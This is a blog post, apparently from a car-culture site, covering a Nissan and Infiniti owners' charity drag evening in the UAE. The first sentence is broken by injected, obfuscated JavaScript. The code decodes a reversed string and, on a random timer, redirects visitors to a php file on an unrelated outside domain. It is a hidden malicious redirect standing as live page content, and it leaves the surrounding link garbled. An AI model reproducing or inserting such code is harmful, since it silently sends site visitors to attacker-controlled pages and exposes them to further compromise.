Mubarak Al Mansouri was getting in the virtual hot laps and had shown up in his beautiful $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/crankandpiston-feature-1973-datsun-510-dubai-uae/” target=”_blank”>Datsun 510. Keeping the Datsun company in the parking area was a C210 Skyline, a rare sight in the Middle East.
Other distinguished guests in the ‘parked but not racing’ area were two Nissan Juke-R‘s. It is believed that both of these are owned by His Highness Sheikh Hamdan bin Mohammed Al Maktoum although no official confirmation was forthcoming. Unfortunately, neither were to run on the night, although I can confirm (after snooping around the engine bay) that the matt black example has had a ‘bit of a tune’.
Parking lot meanderings done with, it was time for the main event. This was a charity drag evening and not a head-to-head elimination event, however, rivalry exists between the G and Z owners and honour would need defending.
Sharing the same Nissan FM platform, the battle between most of the Infiniti G’s and Nissan Z’s (and between each other) lay in the aftermarket additions made by their owners. Stock G and Z platforms, being evenly matched, meant that the battle was mainly down to driver reaction times.
There was no mistaking which car dominated the proceedings. The latest incarnation of Godzilla proved untouchable on the quarter mile. MEGTROC members were in attendance with some seriously tuned examples.
Members of both clubs even had the chance to take the red R35 GT-R for a blast down the strip. Nissan Middle East proving that club membership does indeed have its perks.
